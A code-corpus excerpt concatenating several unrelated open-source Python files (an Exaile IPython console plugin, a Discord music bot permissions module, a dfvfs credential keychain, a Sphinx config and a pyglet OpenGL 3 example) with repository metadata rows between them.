SETTINGS_STRING = 'plugin_ipconsole_option_set'
LOGGER = logging.getLogger(__name__)
class Quitter:
"""Simple class to handle exit, similar to Python 2.5's.
This Quitter is used to circumvent IPython's circumvention
    of the builtin Quitter, since it prevents exaile from closing."""
def __init__(self, exit_function, name):
self.exit_function = exit_function
self.name = name
def __repr__(self):
return 'Type %s() to exit.' % self.name
def __call__(self):
self.exit_function() # Passed in exit function
site.setquit() # Restore default builtins
exit() # Call builtin
class IPView(ip.IPythonView):
'''Extend IPythonView to support closing with Ctrl+D'''
__text_color = None
__background_color = None
__font = None
__css_provider = None
__text_color_str = None
__background_color_str = None
__font_str = None
__iptheme = None
def __init__(self, namespace):
ip.IPythonView.__init__(self)
event.add_ui_callback(self.__on_option_set, SETTINGS_STRING)
self.set_wrap_mode(Gtk.WrapMode.CHAR)
self.updateNamespace(namespace) # expose exaile (passed in)
# prevent exit and quit - freezes window? does bad things
self.updateNamespace({'exit': None, 'quit': None})
style_context = self.get_style_context()
self.__css_provider = Gtk.CssProvider()
style_context.add_provider(
self.__css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
)
# Trigger setup through options
for option in ('text_color', 'background_color', 'font'):
self.__on_option_set(
None, xl_settings, 'plugin/ipconsole/{option}'.format(option=option)
)
def __on_option_set(self, _event, settings, option):
if option == 'plugin/ipconsole/font':
pango_font_str = settings.get_option(option, FONT)
self.__font_str = guiutil.css_from_pango_font_description(pango_font_str)
GLib.idle_add(self.__update_css)
if option == 'plugin/ipconsole/text_color':
rgba_str = settings.get_option(option, 'lavender')
rgba = Gdk.RGBA()
rgba.parse(rgba_str)
self.__text_color_str = "color: " + guiutil.css_from_rgba_without_alpha(
rgba
)
GLib.idle_add(self.__update_css)
if option == 'plugin/ipconsole/background_color':
rgba_str = settings.get_option(option, 'black')
rgba = Gdk.RGBA()
rgba.parse(rgba_str)
self.__background_color_str = (
"background-color: " + guiutil.css_from_rgba_without_alpha(rgba)
)
GLib.idle_add(self.__update_css)
def __update_css(self):
if (
self.__text_color_str is None
or self.__background_color_str is None
or self.__font_str is None
):
# early initialization state: not all properties have been initialized yet
return False
data_str = "text {%s; %s;} textview {%s;}" % (
self.__background_color_str,
self.__text_color_str,
self.__font_str,
)
self.__css_provider.load_from_data(data_str.encode('utf-8'))
return False
def onKeyPressExtend(self, key_event):
if ip.IPythonView.onKeyPressExtend(self, key_event):
return True
if key_event.string == '\x04': # ctrl+d
self.destroy()
class IPythonConsoleWindow(Gtk.Window):
"""
A Gtk Window with an embedded IPython Console.
"""
__ipv = None
def __init__(self, namespace):
Gtk.Window.__init__(self)
self.set_title(_("IPython Console - Exaile"))
self.set_size_request(750, 550)
self.set_resizable(True)
self.__ipv = IPView(namespace)
self.__ipv.connect('destroy', lambda *_widget: self.destroy())
self.__ipv.updateNamespace({'self': self}) # Expose self to IPython
# make it scrollable
scrolled_window = Gtk.ScrolledWindow()
scrolled_window.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scrolled_window.add(self.__ipv)
scrolled_window.show_all()
self.add(scrolled_window)
event.add_ui_callback(self.on_option_set, SETTINGS_STRING)
def on_option_set(self, _event, settings, option):
if option == 'plugin/ipconsole/opacity':
if sys.platform.startswith("win32"):
# Setting opacity on Windows crashes with segfault,
# see https://bugzilla.gnome.org/show_bug.cgi?id=674449
# Ignore this option.
return
value = settings.get_option(option, 80.0)
value = value / 100
if value > 1:
value = 1
self.set_opacity(value)
class IPConsolePlugin:
"""
This class holds the IPConsole plugin itself
"""
__console_window = None
__exaile = None
def enable(self, exaile):
"""
Called when plugin is enabled, or when exaile is loaded with the plugin
on by default.
"""
self.__exaile = exaile
def on_gui_loaded(self):
"""
Called when Exaile finished loading its GUI
"""
# Trigger initial setup through options:
if xl_settings.get_option('plugin/ipconsole/autostart', False):
self.__show_console()
# add menuitem to tools menu
item = menu.simple_menu_item(
'ipconsole',
['plugin-sep'],
_('Show _IPython Console'),
callback=lambda *_args: self.__show_console(),
)
providers.register('menubar-tools-menu', item)
def teardown(self, _exaile):
"""
Called when Exaile is shutting down
"""
# if window is open, kill it
if self.__console_window is not None:
self.__console_window.destroy()
def disable(self, exaile):
"""
Called when the plugin is disabled
"""
for item in providers.get('menubar-tools-menu'):
if item.name == 'ipconsole':
providers.unregister('menubar-tools-menu', item)
break
self.teardown(exaile)
def __show_console(self):
"""
Display window when the menu item is clicked.
"""
if self.__console_window is None:
import xl
import xlgui
self.__console_window = IPythonConsoleWindow(
{'exaile': self.__exaile, 'xl': xl, 'xlgui': xlgui}
)
self.__console_window.connect('destroy', self.__console_destroyed)
self.__console_window.present()
self.__console_window.on_option_set(
None, xl_settings, 'plugin/ipconsole/opacity'
)
def __console_destroyed(self, *_args):
"""
Called when the window is closed.
"""
self.__console_window = None
def get_preferences_pane(self):
"""
Called by Exaile when ipconsole preferences pane should be shown
"""
return ipconsoleprefs
plugin_class = IPConsolePlugin
|
gpl-2.0
| 9,188,069,743,243,977,000 | 31.187266 | 86 | 0.603677 | false |
reddit-diabetes/musicbot-cloud
|
musicbot/permissions.py
|
1
|
6508
|
import shutil
import logging
import traceback
import configparser
import discord
log = logging.getLogger(__name__)
class PermissionsDefaults:
perms_file = 'config/permissions.ini'
CommandWhiteList = set()
CommandBlackList = set()
IgnoreNonVoice = set()
GrantToRoles = set()
UserList = set()
MaxSongs = 0
MaxSongLength = 0
MaxPlaylistLength = 0
AllowPlaylists = True
InstaSkip = False
class Permissions:
def __init__(self, config_file, grant_all=None):
self.config_file = config_file
self.config = configparser.ConfigParser(interpolation=None)
if not self.config.read(config_file, encoding='utf-8'):
log.info("Permissions file not found, copying example_permissions.ini")
try:
shutil.copy('config/example_permissions.ini', config_file)
self.config.read(config_file, encoding='utf-8')
except Exception as e:
traceback.print_exc()
raise RuntimeError("Unable to copy config/example_permissions.ini to {}: {}".format(config_file, e))
self.default_group = PermissionGroup('Default', self.config['Default'])
self.groups = set()
for section in self.config.sections():
self.groups.add(PermissionGroup(section, self.config[section]))
# Create a fake section to fallback onto the permissive default values to grant to the owner
# noinspection PyTypeChecker
owner_group = PermissionGroup("Owner (auto)", configparser.SectionProxy(self.config, None))
if hasattr(grant_all, '__iter__'):
owner_group.user_list = set(grant_all)
self.groups.add(owner_group)
async def async_validate(self, bot):
log.debug("Validating permissions...")
og = discord.utils.get(self.groups, name="Owner (auto)")
if 'auto' in og.user_list:
log.debug("Fixing automatic owner group")
og.user_list = {bot.config.owner_id}
def save(self):
with open(self.config_file, 'w') as f:
self.config.write(f)
def for_user(self, user):
"""
Returns the first PermissionGroup a user belongs to
:param user: A discord User or Member object
"""
for group in self.groups:
if user.id in group.user_list:
return group
# The only way I could search for roles is if I add a `server=None` param and pass that too
if type(user) == discord.User:
return self.default_group
# We loop again so that we don't return a role based group before we find an assigned one
for group in self.groups:
for role in user.roles:
if role.id in group.granted_to_roles:
return group
return self.default_group
def create_group(self, name, **kwargs):
self.config.read_dict({name:kwargs})
self.groups.add(PermissionGroup(name, self.config[name]))
# TODO: Test this
class PermissionGroup:
def __init__(self, name, section_data):
self.name = name
self.command_whitelist = section_data.get('CommandWhiteList', fallback=PermissionsDefaults.CommandWhiteList)
self.command_blacklist = section_data.get('CommandBlackList', fallback=PermissionsDefaults.CommandBlackList)
self.ignore_non_voice = section_data.get('IgnoreNonVoice', fallback=PermissionsDefaults.IgnoreNonVoice)
self.granted_to_roles = section_data.get('GrantToRoles', fallback=PermissionsDefaults.GrantToRoles)
self.user_list = section_data.get('UserList', fallback=PermissionsDefaults.UserList)
self.max_songs = section_data.get('MaxSongs', fallback=PermissionsDefaults.MaxSongs)
self.max_song_length = section_data.get('MaxSongLength', fallback=PermissionsDefaults.MaxSongLength)
self.max_playlist_length = section_data.get('MaxPlaylistLength', fallback=PermissionsDefaults.MaxPlaylistLength)
self.allow_playlists = section_data.get('AllowPlaylists', fallback=PermissionsDefaults.AllowPlaylists)
self.instaskip = section_data.get('InstaSkip', fallback=PermissionsDefaults.InstaSkip)
self.validate()
def validate(self):
if self.command_whitelist:
self.command_whitelist = set(self.command_whitelist.lower().split())
if self.command_blacklist:
self.command_blacklist = set(self.command_blacklist.lower().split())
if self.ignore_non_voice:
self.ignore_non_voice = set(self.ignore_non_voice.lower().split())
if self.granted_to_roles:
self.granted_to_roles = set(self.granted_to_roles.split())
if self.user_list:
self.user_list = set(self.user_list.split())
try:
self.max_songs = max(0, int(self.max_songs))
except:
self.max_songs = PermissionsDefaults.MaxSongs
try:
self.max_song_length = max(0, int(self.max_song_length))
except:
self.max_song_length = PermissionsDefaults.MaxSongLength
try:
self.max_playlist_length = max(0, int(self.max_playlist_length))
except:
self.max_playlist_length = PermissionsDefaults.MaxPlaylistLength
self.allow_playlists = configparser.RawConfigParser.BOOLEAN_STATES.get(
self.allow_playlists, PermissionsDefaults.AllowPlaylists
)
self.instaskip = configparser.RawConfigParser.BOOLEAN_STATES.get(
self.instaskip, PermissionsDefaults.InstaSkip
)
@staticmethod
def _process_list(seq, *, split=' ', lower=True, strip=', ', coerce=str, rcoerce=list):
lower = str.lower if lower else None
_strip = (lambda x: x.strip(strip)) if strip else None
coerce = coerce if callable(coerce) else None
rcoerce = rcoerce if callable(rcoerce) else None
for ch in strip:
seq = seq.replace(ch, split)
values = [i for i in seq.split(split) if i]
for fn in (_strip, lower, coerce):
if fn: values = map(fn, values)
return rcoerce(values)
def add_user(self, uid):
self.user_list.add(uid)
def remove_user(self, uid):
if uid in self.user_list:
self.user_list.remove(uid)
def __repr__(self):
return "<PermissionGroup: %s>" % self.name
def __str__(self):
return "<PermissionGroup: %s: %s>" % (self.name, self.__dict__)
|
mit
| 7,524,979,346,034,419,000 | 34.369565 | 120 | 0.638291 | false |
dc3-plaso/dfvfs
|
dfvfs/credentials/keychain.py
|
1
|
2743
|
# -*- coding: utf-8 -*-
"""The path specification key chain.
The key chain is used to manage credentials for path specifications.
E.g. BitLocker Drive Encryption (BDE) encrypted volumes can require a
credential (e.g. password) to access the unencrypted data (unlock).
"""
from dfvfs.credentials import manager
class KeyChain(object):
"""Class that implements the key chain."""
def __init__(self):
"""Initializes the key chain."""
super(KeyChain, self).__init__()
self._credentials_per_path_spec = {}
def Empty(self):
"""Empties the key chain."""
self._credentials_per_path_spec = {}
def ExtractCredentialsFromPathSpec(self, path_spec):
"""Extracts credentials from a path specification.
Args:
path_spec (PathSpec): path specification to extract credentials from.
"""
credentials = manager.CredentialsManager.GetCredentials(path_spec)
for identifier in credentials.CREDENTIALS:
value = getattr(path_spec, identifier, None)
if value is None:
continue
self.SetCredential(path_spec, identifier, value)
def GetCredential(self, path_spec, identifier):
"""Retrieves a specific credential from the key chain.
Args:
path_spec (PathSpec): path specification.
identifier (str): credential identifier.
Returns:
object: credential or None if the credential for the path specification
is not set.
"""
credentials = self._credentials_per_path_spec.get(path_spec.comparable, {})
return credentials.get(identifier, None)
def GetCredentials(self, path_spec):
"""Retrieves all credentials for the path specification.
Args:
path_spec (PathSpec): path specification.
Returns:
dict[str,object]: credentials for the path specification.
"""
return self._credentials_per_path_spec.get(path_spec.comparable, {})
def SetCredential(self, path_spec, identifier, data):
"""Sets a specific credential for the path specification.
Args:
path_spec (PathSpec): path specification.
identifier (str): credential identifier.
data (object): credential data.
Raises:
KeyError: if the credential is not supported by the path specification
type.
"""
supported_credentials = manager.CredentialsManager.GetCredentials(path_spec)
if identifier not in supported_credentials.CREDENTIALS:
raise KeyError((
          u'Unsupported credential: {0:s} for path specification type: '
u'{1:s}').format(identifier, path_spec.type_indicator))
credentials = self._credentials_per_path_spec.get(path_spec.comparable, {})
credentials[identifier] = data
self._credentials_per_path_spec[path_spec.comparable] = credentials
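# --- Hedged usage sketch (not part of the original module). Assumes
# `bde_path_spec` is a BDE path specification obtained elsewhere (e.g. via
# dfvfs's path specification factory) and that 'password' is a credential
# identifier supported by its credentials object.
# key_chain = KeyChain()
# key_chain.SetCredential(bde_path_spec, u'password', u'my-secret')
# password = key_chain.GetCredential(bde_path_spec, u'password')
# all_credentials = key_chain.GetCredentials(bde_path_spec)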
|
apache-2.0
| -8,760,681,104,130,690,000 | 31.654762 | 80 | 0.692308 | false |
tsroten/ticktock
|
docs/conf.py
|
1
|
6517
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Tick Tock documentation build configuration file, created by
# sphinx-quickstart on Mon Dec 23 21:32:46 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Tick Tock'
copyright = '2014, Thomas Roten'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'TickTockdoc'
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ticktock', 'Tick Tock Documentation',
['Thomas Roten'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'python': ('http://docs.python.org/3.3', None)}
|
mit
| 7,387,666,310,333,664,000 | 31.914141 | 79 | 0.716127 | false |
nicememory/pie
|
pyglet/examples/opengl_3.py
|
1
|
1655
|
#!/usr/bin/python
# $Id:$
'''In order to use the new features of OpenGL 3, you must explicitly create
an OpenGL 3 context. You can do this by supplying the `major_version` and
`minor_version` attributes for a GL Config.
This example creates an OpenGL 3 context, prints the version string to stdout,
and exits.
At time of writing, only the beta nvidia driver on Windows and Linux supports
OpenGL 3, and requires an 8-series or higher GPU.
On Windows, OpenGL 3 API must be explicitly enabled using the nvemulate tool
[1]. Additionally, at time of writing the latest driver did not yet support
forward compatible or debug contexts.
On Linux, the only driver that currently exposes the required GLX extensions
is 177.61.02 -- later drivers (177.67, 177.68, 177.7*, 177.8*, 180.06) seem to
be missing the extensions.
[1] http://developer.nvidia.com/object/nvemulate.html
'''
from __future__ import print_function
import pyglet
# Specify the OpenGL version explicitly to request 3.0 features, including
# GLSL 1.3.
#
# Some other attributes relevant to OpenGL 3:
# forward_compatible = True To request a context without deprecated
# functionality
# debug = True To request a debug context
config = pyglet.gl.Config(major_version=3, minor_version=0)
# Create a context matching the above configuration. Will fail if
# OpenGL 3 is not supported by the driver.
window = pyglet.window.Window(config=config, visible=False)
# Print the version of the context created.
print('OpenGL version:', window.context.get_info().get_version())
window.close()
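# --- Hedged sketch (not in the original example): the same Config mechanism
# can request the forward-compatible / debug contexts mentioned above; context
# creation may still fail depending on driver support.
# config = pyglet.gl.Config(major_version=3, minor_version=0,
#                           forward_compatible=True, debug=True)
# window = pyglet.window.Window(config=config, visible=False)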
|
apache-2.0
| 8,591,080,027,478,945,000 | 34.777778 | 78 | 0.712387 | false |